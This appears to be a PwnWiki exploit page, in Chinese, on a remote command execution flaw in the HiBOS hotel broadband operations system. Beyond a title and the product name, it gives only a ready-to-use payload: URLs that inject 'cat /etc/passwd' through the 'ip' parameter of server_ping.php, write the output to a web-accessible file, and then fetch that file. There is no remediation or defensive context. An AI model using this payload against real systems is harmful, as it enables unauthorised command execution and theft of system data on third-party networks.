HiBOS酒店宽带运营系统RCE漏洞

From PwnWiki
This page is a translated version of the page HiBOS酒店寬帶運營系統RCE漏洞 and the translation is 100% complete.
Other languages:
Chinese • ‎中文(中国大陆)‎

漏洞简介

HiBOS 酒店宽带运营系统

Payload

http://xx.xx.xx.xx/manager/radius/server_ping.php?ip=127.0.0.1|cat /etc/passwd >../../aaa.txt&id=1
http://xx.xx.xx.xx/aaa.txt